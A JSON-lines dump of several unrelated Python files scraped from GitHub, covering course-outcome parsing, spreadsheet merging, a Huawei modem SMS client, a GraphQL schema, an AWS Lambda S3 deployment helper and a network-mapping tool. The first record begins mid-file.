    |', text)\n if len(CLOs) == 1:\n CLOs = re.split('
  • |
  • |
    |
    |

    |

    |
    |

    |
    |CLO', text)\n \n CLOs_2 = []\n for clo in CLOs:\n clo = clo.replace('
    ', '\\n')\n clo = cleanhtml(clo)\n try:\n clo = clo.strip()\n clo = clo.rstrip()\n clo = clo.strip('-')\n clo = clo.strip('•')\n clo = clo.strip('*')\n clo = clo.strip('1')\n clo = clo.strip('2')\n clo = clo.strip('3')\n clo = clo.strip('4')\n clo = clo.strip('5')\n clo = clo.strip('6')\n clo = clo.strip('7')\n clo = clo.strip('8')\n clo = clo.strip('9')\n clo = clo.strip('0')\n clo = clo.strip('.')\n if clo.startswith(\":\"):\n clo = clo[1:]\n clo = clo.strip(')')\n clo = clo.strip('\\uf0a7')\n clo = clo.strip()\n except: pass\n \n if len(clo) > 10:\n CLOs_2.append(clo)\n\n else:\n NotOKlist = ['

    ', '

    ', '
    ', '
    ', '
    ', '
    ', '
    ','CLO']\n if any(s in text for s in NotOKlist):\n CLOs = re.split('
    |
    |

    |

    |
    |CLO|

    |
    ', text)\n else:\n return [text]\n CLOs_2 = []\n for clo in CLOs:\n clo = clo.replace('
    ', '\\n')\n clo = cleanhtml(clo)\n try:\n clo = clo.strip()\n clo = clo.rstrip()\n clo = clo.strip('-')\n clo = clo.strip('•')\n clo = clo.strip('*')\n clo = clo.strip('1')\n clo = clo.strip('2')\n clo = clo.strip('3')\n clo = clo.strip('4')\n clo = clo.strip('5')\n clo = clo.strip('6')\n clo = clo.strip('7')\n clo = clo.strip('8')\n clo = clo.strip('9')\n clo = clo.strip('0')\n clo = clo.strip('.')\n if clo.startswith(\":\"):\n clo = clo[1:]\n clo = clo.strip(')')\n clo = clo.strip('\\uf0a7')\n clo = clo.strip()\n except Exception as e:\n print(cid)\n print(e)\n pass\n \n if len(clo) > 10:\n CLOs_2.append(clo)\n\n if len(CLOs_2) == 1:\n return CLOs_2\n \n while ':' in CLOs_2[0][-4:]:\n CLOs_2 = CLOs_2[1:]\n \n while 'Learning Outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n\n if 'Learning outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'learning outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'completion of this course' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n\n if 'Enabling Knowledge and Skills for Capabilities' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'engage in activities leading to an understanding of\\n' == CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n return CLOs_2\n \n except Exception as e:\n print(cid)\n print(e)\n print(text, '\\n')\n return['']\n\n# open template\ndirectory = 'H:\\\\Projects\\\\CoB\\\\Program Transformation\\\\CLO mapping\\\\Success\\\\'\nclo_filename = 'CLOs_cob_success.xlsx'\ntemplate = 'CLO_template_success.xlsx'\nsavefile = 'CLOs_cob_success_2_extra.xlsx'\n\n\n# open template\nwb = openpyxl.load_workbook(directory+template)\n\n\n# fill CLOs worksheet\nclo_df = pd.read_excel(open(directory+clo_filename, 'rb'), converters={'Course ID': str})\n\n\nclo_ws = wb.active\n\nj = 2\nfor i, r in clo_df.iterrows():\n CLO_list = []\n CLO_list = get_CLOs(r['Learning Outcomes'], r['Course ID'])\n k = 1\n for clo in CLO_list:\n clo_ws.cell(row=j, column=1).value = r['Course ID']\n clo_ws.cell(row=j, column=2).value = r['Course Title']\n clo_ws.cell(row=j, column=3).value = r['School ID']\n clo_ws.cell(row=j, column=4).value = get_school_name(r['School ID'])\n clo_ws.cell(row=j, column=5).value = 'CLO{}'.format(k)\n clo_ws.cell(row=j, column=6).alignment = Alignment(wrapText=True)\n clo_ws.cell(row=j, column=6).value = clo\n clo_ws.cell(row=j, column=7).value = r['Version']\n clo_ws.cell(row=j, column=8).value = r['Status']\n clo_ws.cell(row=j, column=9).value = r['Publish/Unpublish Time']\n j += 1\n k += 1\nwb.save(directory+savefile)\n\n\n\n","repo_name":"pjryan356/CoB","sub_path":"PLO alignment/CLO_separation.py","file_name":"CLO_separation.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32397978784","text":"import threading\nimport binascii\nfrom time import sleep\nimport utils as u\n\n\nclass Camera(object):\n def __init__(self, makeup_artist):\n self.to_process = []\n self.to_output = []\n\n thread = threading.Thread(target=self.keep_processing, args=())\n thread.daemon = True\n thread.start()\n print(\"[INFO] camera initialized\")\n\n def process_one(self):\n if not self.to_process:\n return\n\n # input is an ascii string. \n input_str = self.to_process.pop(0)\n\n # convert it to a pil image\n input_img = u.base64_to_cv(input_str)\n\n ################## where the hard work is done ############\n # output_img is an PIL image\n output_img = self.makeup_artist.apply_makeup(input_img)\n\n # output_str is a base64 string in ascii\n output_str = pil_image_to_base64(output_img)\n\n # convert eh base64 string in ascii to base64 string in _bytes_\n self.to_output.append(binascii.a2b_base64(output_str))\n\n def capture(self, id):\n frame = self.get_frame()\n timestamp = strftime(\"%d-%m-%Y-%Hh%Mm%Ss\", localtime())\n path = Camera.CAPTURES_DIR + str(id) + \"/\"\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n no = len(os.listdir(path))\n filename = path + str(no) +\".jpg\"\n\n print(\"[INFO] FILENAME :\", filename)\n print(\"[INFO] size : \", type(frame))\n\n if not cv.imwrite(filename, frame):\n raise RuntimeError(\"Unable to capture image \"+timestamp)\n return timestamp\n\n def keep_processing(self):\n while True:\n self.process_one()\n sleep(0.01)\n\n def enqueue_input(self, input):\n self.to_process.append(input)\n\n def get_frame(self):\n while not self.to_output:\n sleep(0.05)\n return self.to_output.pop(0)","repo_name":"aditya-29/contactless_attendance","sub_path":"webpage/camera_socket.py","file_name":"camera_socket.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71267641381","text":"# Importing dependencies\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n# Loading all files into a dataframe\r\nold_sov = pd.read_excel(\"../SOVs/Final SOV Uploaded to Origami 12-10 - Includes MDS.xlsx\")\r\nsov = pd.read_excel(\"Overlay_SOVs.xlsx\")\r\nQ1 = pd.read_excel(\"../Q_Data_Revanatge/Q1'20 US Master Property List_vF_Hardcoded.xlsx\", skiprows=9)\r\nmds = pd.read_excel(\"../Origami_locations/Added Column - Origami Locations - 7-9-20.xlsx\")\r\npossible = pd.read_excel(\"Possibel Matches (1).xlsx\")\r\n\r\n# Data Cleaning and Address normalization functions\r\ndef replace_last(source_string, replace_what, replace_with):\r\n head, _sep, tail = source_string.rpartition(replace_what)\r\n return head + replace_with + tail\r\n \r\ndef replace_second(source_string, dict_):\r\n s = source_string.split(' ')\r\n if len(s) >1 :\r\n if s[1].replace('.', '').lower() in dict_.keys():\r\n s[1] = dict_[s[1].replace('.', '')]\r\n return ' '.join(s)\r\n else: \r\n return source_string\r\n else:\r\n return source_string\r\n\r\n#def similar(a, b):\r\n #return SequenceMatcher(None, a, b).ratio()\r\n\r\n\"\"\" Retained columns from each file\r\n=====================================================================================================================\"\"\"\r\n\r\nretainedCols = ['Address_Line_1','Address_Line_2', 'City', 'possibleMatches SOV 12-10', 'possibleMatches Q1 2020', 'possibleMatches Origami Locations 7-9-20' ]\r\n\r\nsov_cols = ['index', 'Business_ID','Location',\t'Property_ID',\t'Property',\t'Portfolio_Company_ID',\t'Portfolio_Company',\t\r\n 'Fund',\t'Investment',\t'Occupancy_Asset_Class',\t'Legal_Entity',\t'Main_Insurance_Portfolio',\t\r\n 'Normalized_Construction_Type',\t'Normalized_Occupancy',\t'Latitude',\t'Longitude']\r\n\r\nmds_cols = ['index', 'BusinessID',\t'Name', 'Legal Entity',\t'Investment','Fund', 'Portfolio Company']\r\nQ1_cols = ['index','Property MDM ID',\t'Fund',\t'Investment Deal', 'Portfolio Company',\t'Property Name','Sector']\r\n\r\n\r\n# drop dups\r\npossible = possible.drop_duplicates(subset=['Address_Line_1','Address_Line_2', 'City'])\r\n\r\n# Overlaying sov and manual ross mapping with the possible matches \r\nmerg1 = pd.merge(sov,possible[retainedCols], on=['Address_Line_1','Address_Line_2', 'City'], how='left', validate = 'm:1')\r\nmerg1['sov_indexs'] = merg1['possibleMatches SOV 12-10'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\nmerg1['Q1_indexs'] = merg1['possibleMatches Q1 2020'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\nmerg1['mds_indexs'] = merg1['possibleMatches Origami Locations 7-9-20'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\n\r\n# Creating an index to merge the data on\r\nold_sov.index +=2\r\nold_sov.reset_index(inplace=True)\r\n# Merging the entire overlay with the old SOV to pull all manually mapped columns\r\nmerge_sov = pd.merge(merg1,old_sov[sov_cols], how='left', left_on='sov_indexs', right_on='index', validate = 'm:1', suffixes=('','_sov'))\r\n\r\n\r\nsov_cols.remove('index')\r\n# updating all the columns from the new pulled columns \r\nfor col in sov_cols:\r\n try:\r\n merge_sov[f'{col}'] = np.where(pd.notnull(merge_sov[f'{col}_sov']), merge_sov[f'{col}_sov'], merge_sov[f'{col}'])\r\n except Exception as e: print(e)\r\n\r\n# Adding an index to Q1 and performing the merge and the update\r\nQ1.index +=11\r\nQ1.reset_index(inplace=True) \r\nmeregeQ1 = pd.merge(merge_sov,Q1[Q1_cols], how='left', left_on='Q1_indexs', right_on='index', validate = 'm:1', suffixes=('','_Q1'))\r\nmeregeQ1['Business_ID'] = np.where(pd.notnull(meregeQ1['Property MDM ID']), meregeQ1['Property MDM ID'], meregeQ1['Business_ID'])\r\nmeregeQ1['Fund'] = np.where(pd.notnull(meregeQ1['Fund_Q1']), meregeQ1['Fund_Q1'], meregeQ1['Fund'])\r\nmeregeQ1['Investment'] = np.where(pd.notnull(meregeQ1['Investment Deal']), meregeQ1['Investment Deal'], meregeQ1['Investment'])\r\nmeregeQ1['Property'] = np.where(pd.notnull(meregeQ1['Property Name']), meregeQ1['Property Name'], meregeQ1['Property'])\r\nmeregeQ1['Occupancy_Asset_Class'] = np.where(pd.notnull(meregeQ1['Sector']), meregeQ1['Sector'], meregeQ1['Occupancy_Asset_Class'])\r\nmeregeQ1['Portfolio_Company'] = np.where(pd.notnull(meregeQ1['Portfolio Company']), meregeQ1['Portfolio Company'], meregeQ1['Portfolio_Company'])\r\n\r\n# Adding an index to MDS and performing the merge and the update\r\nmds.index +=2\r\nmds.reset_index(inplace=True) \r\n\r\nfinal = pd.merge(meregeQ1,mds[mds_cols], how='left', left_on='mds_indexs', right_on='index', validate = 'm:1', suffixes=('', '_mds'))\r\nfinal['Business_ID'] = np.where(pd.notnull(final['BusinessID']), final['BusinessID'], final['Business_ID'])\r\nfinal['Location'] = np.where(pd.notnull(final['Name']), final['Name'], final['Location'])\r\nfinal['Investment'] = np.where(pd.notnull(final['Investment_mds']), final['Investment_mds'], final['Investment'])\r\nfinal['Legal_Entity'] = np.where(pd.notnull(final['Legal Entity']), final['Legal Entity'], final['Legal_Entity'])\r\nfinal['Portfolio_Company'] = np.where(pd.notnull(final['Portfolio Company_mds']), final['Portfolio Company_mds'], final['Portfolio_Company'])\r\nfinal['Fund'] = np.where(pd.notnull(final['Fund_mds']), final['Fund_mds'], final['Fund'])\r\n\r\nprint(len(final))\r\n\r\n# Writing the final results to an excel file\r\n#final[sov.columns.to_list()].to_excel('Test_07-14.xlsx', index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cheikhsidi/Diverse-Scripts","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14345886467","text":"import contextlib\nimport httpx\nimport xmltodict as xmltodict\n\nfrom datetime import datetime\nfrom typing import List\nfrom httpx import Client\nfrom pydantic import HttpUrl\n\nSMS_LIST_TEMPLATE = \"\"\"\n 1\n 20\n 1\n 0\n 0\n 0\n \"\"\"\n\nSMS_DEL_TEMPLATE = \"\"\"\n {index}\n \"\"\"\n\nSMS_SEND_TEMPLATE = \"\"\"\n -1\n {phone}\n \n {content}\n {length}\n 1\n {timestamp}\n \"\"\"\n\n\ndef is_hilink(device_host: HttpUrl) -> bool:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/device/information\", timeout=2.0)\n except httpx.ConnectTimeout as err:\n return False\n\n if response.status_code != 200:\n return False\n\n return True\n\n\ndef get_headers(device_host: HttpUrl) -> dict:\n token = None\n session_id = None\n\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/webserver/SesTokInfo\")\n except httpx.ConnectTimeout as err:\n return {}\n\n if response.status_code != 200:\n return {'__RequestVerificationToken': token, 'Cookie': session_id}\n\n with contextlib.suppress(Exception):\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n if 'response' in response_data and 'TokInfo' in response_data[\"response\"]:\n token = response_data['response']['TokInfo']\n\n if 'response' in response_data and 'SesInfo' in response_data['response']:\n session_id = response_data['response']['SesInfo']\n\n headers = {'__RequestVerificationToken': token, 'Cookie': session_id}\n\n return headers\n\n\ndef get_sms(device_host: HttpUrl, headers: dict):\n payload = SMS_LIST_TEMPLATE\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/sms-list\", data=payload, headers=headers)\n except httpx.ConnectTimeout as err:\n pass\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n num_messages = int(response_data['response']['Count'])\n messages_r = response_data['response']['Messages']['Message']\n\n if num_messages == 1:\n temp = messages_r\n messages_r = [temp]\n\n messages = get_content(messages_r, num_messages)\n return messages, messages_r\n\n\ndef get_content(data, num_messages) -> List[str]:\n messages = []\n for i in range(num_messages):\n message = data[i]\n number = message['Phone']\n content = message['Content']\n date = message['Date']\n messages.append('Message from ' + number + ' recieved ' + date + ' : ' + str(content))\n\n return messages\n\n\ndef del_message(device_host: HttpUrl, headers: dict, index: int) -> None:\n payload = SMS_DEL_TEMPLATE.format(index=index)\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/delete-sms\", data=payload, headers=headers)\n except httpx.ConnectTimeout as err:\n pass\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n print(response_data['response'])\n\n\ndef get_unread(device_host: HttpUrl, headers: dict) -> int:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/monitoring/check-notifications\", headers=headers)\n except httpx.ConnectTimeout as err:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n unread = int(response_data['response']['UnreadMessage'])\n\n return unread\n\n\ndef wait_send_sms_to_phone(device_host: HttpUrl, phone_number: str) -> bool:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/sms/send-status\")\n except httpx.ConnectTimeout as err:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n phone = response_data[\"response\"][\"Phone\"]\n phone_success = response_data[\"response\"][\"SucPhone\"]\n phone_fail = response_data[\"response\"][\"FailPhone\"]\n total_count = response_data[\"response\"][\"TotalCount\"]\n current_index = response_data[\"response\"][\"CurIndex\"]\n\n if phone and phone != phone_number:\n return False\n if phone_success and phone_success != phone_number:\n return False\n if phone_fail and phone_fail == phone_number:\n return False\n\n if current_index < total_count:\n return False\n\n return True\n\n\ndef send_sms_to_phone(device_host: HttpUrl, phone: str, message: str) -> bool:\n payload = SMS_SEND_TEMPLATE.format(\n phone=phone,\n content=message,\n length=len(message),\n timestamp=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/send-sms\", data=payload)\n if response.status_code != 200:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n\n return response_data[\"response\"] == \"OK\"\n\n except httpx.ConnectTimeout as err:\n return False\n","repo_name":"jadjer/rideonline_sms","sub_path":"app/services/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28141957631","text":"import strawberry\nfrom strawberry_django_plus import gql\nfrom strawberry_django_plus.optimizer import DjangoOptimizerExtension\nfrom typing import List, Optional\n\nfrom strawberry_django_plus.relay import GlobalID\n\nfrom company import types, models\n\n\n@gql.django.input(models.Company)\nclass CompanyInput:\n name: gql.auto\n\n\n@gql.django.partial(models.Company)\nclass CompanyInputPartial(gql.NodeInput):\n name: gql.auto\n\n\n@gql.django.input(models.Employee)\nclass EmployeeInput:\n first_name: gql.auto\n last_name: gql.auto\n company: gql.auto\n projects: gql.auto\n\n\n@gql.django.partial(models.Employee)\nclass EmployeeInputPartial(gql.NodeInput):\n first_name: gql.auto\n last_name: gql.auto\n company: gql.auto\n projects: gql.auto\n\n\n@gql.django.input(models.Project)\nclass ProjectInput:\n type: gql.auto\n duration_hours: gql.auto\n # TODO: Ask Albert how to write proper lists queries + how it should be implemented on api side\n employees: List[EmployeeInput]\n\n\n@gql.django.partial(models.Project)\nclass ProjectInputPartial(gql.NodeInput):\n type: gql.auto\n duration_hours: gql.auto\n employees: gql.auto\n\n\n@gql.type\nclass Query:\n companies: List[types.Company] = gql.django.field()\n employees: List[types.Employee] = gql.django.field()\n projects: List[types.Project] = gql.django.field()\n\n\n@gql.type\nclass Mutation:\n # !IMPORTANT : ID FIELD NEEDS TO BE ALWAYS ENCODED TO BASE64\n # For example Company:1 == Q29tcGFueTox\n\n \"\"\"\n mutation {\n createCompany(input: {name: \"First Company\"}) {\n ... on Company {\n name\n }\n }\n }\n \"\"\"\n create_company: types.Company = gql.django.create_mutation(CompanyInput)\n\n \"\"\"\n mutation {\n updateCompany(input: {id: \"Q29tcGFueTox\", name: \"First Name Changed\"}) {\n ... on Company {\n name\n }\n }\n }\n \"\"\"\n update_company: types.Company = gql.django.update_mutation(CompanyInputPartial)\n delete_company: types.Company = gql.django.delete_mutation(gql.NodeInput)\n \"\"\"\n mutation {\n createEmployee(input: {firstName: \"Dawid\", lastName: \"Adamski\", company: {id: \"Q29tcGFueTox\"}}) {\n ... on Employee {\n firstName\n }\n }\n }\n \"\"\"\n create_employee: types.Employee = gql.django.create_mutation(EmployeeInput)\n update_employee: types.Employee = gql.django.update_mutation(EmployeeInputPartial)\n delete_employee: types.Employee = gql.django.delete_mutation(gql.NodeInput)\n\n create_project: types.Project = gql.django.create_mutation(ProjectInput)\n update_project: types.Project = gql.django.update_mutation(ProjectInputPartial)\n delete_project: types.Project = gql.django.delete_mutation(gql.NodeInput)\n\n\nschema = strawberry.Schema(query=Query, mutation=Mutation, extensions=[DjangoOptimizerExtension])\n","repo_name":"Lok3rs/django_react_graphql","sub_path":"api/company/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37324364003","text":"import boto3\nimport json\nimport logging\nimport os\nfrom urllib.request import build_opener, HTTPHandler, Request\n\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\n\ns3 = boto3.resource('s3')\ns3_client = boto3.client('s3')\n\nreplace_env_variables = False\n\n\ndef send_response(event, context, response_status, response_data):\n \"\"\"\n Send a resource manipulation status response to CloudFormation\n \"\"\"\n response_body = json.dumps({\n \"Status\": response_status,\n \"Reason\": \"See the details in CloudWatch Log Stream: \" + context.log_stream_name,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event['StackId'],\n \"RequestId\": event['RequestId'],\n \"LogicalResourceId\": event['LogicalResourceId'],\n \"Data\": response_data\n })\n\n LOGGER.info('ResponseURL: {s}'.format(s=event['ResponseURL']))\n LOGGER.info('ResponseBody: {s}'.format(s=response_body))\n\n opener = build_opener(HTTPHandler)\n request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))\n request.add_header('Content-Type', '')\n request.add_header('Content-Length', len(response_body))\n request.get_method = lambda: 'PUT'\n response = opener.open(request)\n LOGGER.info(\"Status code: {s}\".format(s=response.getcode))\n LOGGER.info(\"Status message: {s}\".format(s=response.msg))\n\n\ndef write_to_s3(event, context, bucket, key, body):\n try:\n s3_client.put_object(Bucket=bucket, Key=key, Body=body)\n except Exception as e:\n LOGGER.info('Unable to write file to s3: {e}'.format(e=e))\n send_response(event, context, \"FAILED\",\n {\"Message\": \"Failed to write file to s3 after variable replacement\"})\n else:\n LOGGER.info('Wrote file back to s3 after variable replacement')\n\n\ndef read_from_s3(event, context, bucket, key):\n try:\n obj = s3_client.get_object(\n Bucket=bucket,\n Key=key\n )\n except Exception as e:\n LOGGER.info(\n 'Unable to read key: {key} in from s3 bucket: {bucket}. Error: {e}'.format(e=e, key=key, bucket=bucket))\n send_response(event, context, \"FAILED\",\n {\"Message\": \"Failed to read file from s3\"})\n else:\n results = obj['Body'].read().decode('utf-8')\n return results\n\n\ndef copy_source(event, context):\n try:\n source_bucket = event[\"ResourceProperties\"][\"WebsiteCodeBucket\"]\n source_key = event[\"ResourceProperties\"][\"WebsiteCodePrefix\"]\n website_bucket = event[\"ResourceProperties\"][\"DeploymentBucket\"].split('.')[0]\n except KeyError as e:\n LOGGER.info(\"Failed to retrieve required values from the CloudFormation event: {e}\".format(e=e))\n send_response(event, context, \"FAILED\", {\"Message\": \"Failed to retrieve required values from the CloudFormation event\"})\n else:\n try:\n LOGGER.info(\"Checking if custom environment variables are present\")\n\n try:\n FileManagerAPIEndpoint = os.environ['FileManagerAPIEndpoint']\n region = os.environ['AwsRegion']\n user_pool_id = os.environ['UserPoolId']\n client_id = os.environ['PoolClientId']\n identity_id = os.environ['IdentityPoolId']\n except KeyError:\n replace_env_variables = False\n else:\n new_variables = {\"fileManagerApiUrl\": FileManagerAPIEndpoint, \"awsRegion\": region,\n \"userPoolId\": user_pool_id, \"userPoolIdClientId\": client_id, \"identityPoolId\": identity_id}\n\n replace_env_variables = True\n LOGGER.info(\n \"New variables: {v}\".format(v=new_variables))\n\n deployment_bucket = s3.Bucket(website_bucket)\n\n with open('./webapp-manifest.json') as file:\n manifest = json.load(file)\n print('UPLOADING FILES::')\n for key in manifest:\n print('s3://'+source_bucket+'/'+source_key+'/'+key)\n copy_source = {\n 'Bucket': source_bucket,\n 'Key': source_key+'/'+key\n }\n s3.meta.client.copy(copy_source, website_bucket, key)\n if replace_env_variables is True and key == \"runtimeConfig.json\":\n LOGGER.info(\"updating runtimeConfig.json\")\n write_to_s3(event, context, website_bucket, key, json.dumps(new_variables))\n\n except Exception as e:\n LOGGER.info(\"Unable to copy website source code into the website bucket: {e}\".format(e=e))\n send_response(event, context, \"FAILED\", {\"Message\": \"Unexpected event received from CloudFormation\"})\n else:\n send_response(event, context, \"SUCCESS\",\n {\"Message\": \"Resource creation successful!\"})\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Handle Lambda event from AWS\n \"\"\"\n try:\n LOGGER.info('REQUEST RECEIVED:\\n {s}'.format(s=event))\n LOGGER.info('REQUEST RECEIVED:\\n {s}'.format(s=context))\n if event['RequestType'] == 'Create':\n LOGGER.info('CREATE!')\n copy_source(event, context)\n elif event['RequestType'] == 'Update':\n LOGGER.info('UPDATE!')\n copy_source(event, context)\n elif event['RequestType'] == 'Delete':\n LOGGER.info('DELETE!')\n send_response(event, context, \"SUCCESS\",\n {\"Message\": \"Resource deletion successful!\"})\n else:\n LOGGER.info('FAILED!')\n send_response(event, context, \"FAILED\", {\"Message\": \"Unexpected event received from CloudFormation\"})\n except Exception as e:\n LOGGER.info('FAILED!')\n send_response(event, context, \"FAILED\", {\"Message\": \"Exception during processing: {e}\".format(e=e)})","repo_name":"aws-solutions/simple-file-manager-for-amazon-efs","sub_path":"source/helper/website_helper.py","file_name":"website_helper.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"35"} +{"seq_id":"11307781523","text":"import sys\nimport getopt\nimport datetime\nimport os\n\nimport mnetsuite\n\ndef print_syntax():\n\tprint('Usage:\\n'\n\t\t\t' mnet.py graph -r \\n'\n\t\t\t' -f \\n'\n\t\t\t' [-d ]\\n'\n\t\t\t' [-c ]\\n'\n\t\t\t' [-t ]\\n'\n\t\t\t' [-C ]\\n'\n\t\t\t'\\n'\n\t\t\t' mnet.py tracemac -r \\n'\n\t\t\t' -m \\n'\n\t\t\t' [-c ]\\n'\n\t\t\t'\\n'\n\t\t\t' mnet.py config\\n'\n\t\t)\n\n\ndef print_banner():\n\tprint('MNet Suite v%s' % mnetsuite.__version__)\n\tprint('Written by Michael Laforest ')\n\tprint('')\n\n\ndef main(argv):\n\topt_root_ip = None\n\tif (len(argv) < 1):\n\t\tprint_banner()\n\t\tprint_syntax()\n\t\treturn\n\n\tmod = argv[0]\n\tif (mod == 'graph'):\n\t\tprint_banner()\n\t\tgraph(argv[1:])\n\telif (mod == 'tracemac'):\n\t\tprint_banner()\n\t\ttracemac(argv[1:])\n\telif (mod == 'config'):\n\t\tgenerate_config()\n\telse:\n\t\tprint_banner()\n\t\tprint_syntax()\n\n\ndef graph(argv):\n\tmax_depth = 0\n\n\tgraph = mnetsuite.mnet_graph()\n\n\topt_dot = None\n\topt_depth = 0\n\topt_title = 'MNet Network Diagram'\n\topt_conf = './mnet.conf'\n\topt_catalog = None\n\n\ttry:\n\t\topts, args = getopt.getopt(argv, 'f:d:r:t:F:c:C:')\n\texcept getopt.GetoptError:\n\t\tprint_syntax()\n\t\tsys.exit(1)\n\tfor opt, arg in opts:\n\t\tif (opt == '-r'):\n\t\t\topt_root_ip = arg\n\t\tif (opt == '-f'):\n\t\t\topt_dot = arg\n\t\tif (opt == '-d'):\n\t\t\topt_depth = int(arg)\n\t\t\tmax_depth = int(arg)\n\t\tif (opt == '-t'):\n\t\t\topt_title = arg\n\t\tif (opt == '-c'):\n\t\t\topt_conf = arg\n\t\tif (opt == '-C'):\n\t\t\topt_catalog = arg\n\n\tif ((opt_root_ip == None) | (opt_dot == None)):\n\t\tprint_syntax()\n\t\tprint('Invalid arguments.')\n\t\treturn\n\n\tprint(' Config file: %s' % opt_conf)\n\tprint(' Root node: %s' % opt_root_ip)\n\tprint(' Output file: %s' % opt_dot)\n\tprint(' Crawl depth: %s' % opt_depth)\n\tprint(' Diagram title: %s' % opt_title)\n\tprint('Out Catalog file: %s' % opt_catalog)\n\n\tprint('\\n\\n')\n\n\t# load the config\n\tif (graph.load_config(opt_conf) == 0):\n\t\treturn\n\tgraph.set_max_depth(opt_depth)\n\n\t# start\n\tgraph.crawl(opt_root_ip)\n\t\t\n\t# outputs\n\tgraph.output_stdout()\n\n\tif (opt_dot != None):\n\t\tgraph.output_dot(opt_dot, opt_title)\n\n\tif (opt_catalog != None):\n\t\tgraph.output_catalog(opt_catalog)\n\n\ndef tracemac(argv):\n\ttrace = mnetsuite.mnet_tracemac()\n\n\topt_root_ip = None\n\topt_conf = './mnet.conf'\n\topt_mac = None\n\n\ttry:\n\t\topts, args = getopt.getopt(argv, 'r:c:m:')\n\texcept getopt.GetoptError:\n\t\tprint_syntax()\n\t\treturn\n\tfor opt, arg in opts:\n\t\tif (opt == '-r'):\n\t\t\topt_root_ip = arg\n\t\tif (opt == '-c'):\n\t\t\topt_conf = arg\n\t\tif (opt == '-m'):\n\t\t\topt_mac = arg\n\n\tif ((opt_root_ip == None) | (opt_mac == None)):\n\t\tprint_syntax()\n\t\tprint('Invalid arguments.')\n\t\treturn\n\n\tprint(' Config file: %s' % opt_conf)\n\tprint(' Root node: %s' % opt_root_ip)\n\tprint(' MAC address: %s' % opt_mac)\n\n\tprint('\\n\\n')\n\n\tmac = trace.parse_mac(opt_mac)\n\tif (mac == None):\n\t\tprint('MAC address is invalid.')\n\t\treturn\n\n\t# load config\n\ttrace.load_config(opt_conf)\n\n\t# start\n\tprint('Start trace.')\n\tprint('------------')\n\n\tip = opt_root_ip\n\twhile (ip != None):\n\t\tip = trace.trace(ip, mac)\n\t\tprint('------------')\n\n\tprint('Trace complete.\\n')\n\n\ndef generate_config():\n\tconf = mnetsuite.config.mnet_config()\n\tprint('%s' % conf.generate_new())\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n\n","repo_name":"routeallthings/Network-Documentation-Automation","sub_path":"external/mnetsuite/mnet.py","file_name":"mnet.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41195898171","text":"#! python3\n# -*- coding:utf-8 -*-\n'''\nTitle: 功能操作类\nDescription: \n@author: Xushenwei\n@update: 2017年12月13日\n'''\nimport configparser, screen_point,autoit\nfrom time import sleep\nfrom common_function import verifySystemMetrics, get_base_dir, copy_config\nfrom autoit_function import MouseControl, WinControl, ProcessControl\n\n\nclass Base(object):\n\n\n\tdef __init__(self):\n\t\t# 读取配置文件\n\t\tconf = configparser.ConfigParser()\n\t\tconf.read(r\"F:\\pythondemo\\自动化测试脚本\\质检计量\\IMconfig.ini\")\n\t\t# 读取安装路径\n\t\tself.path = conf.get('install', 'path')\n\t\t# 读取登录信息\n\t\tself.username = conf.get('login', 'username')\n\t\tself.password = conf.get('login', 'password')\n\t\tself.ip = conf.get('login', 'ip')\n\t\t# 读取进程名称\n\t\tself.ShellProcess = conf.get('process', 'Shell')\n\t\tself.BECivilProcess = conf.get('process', 'BECivil')\n\t\tself.IMProcess = conf.get('process', 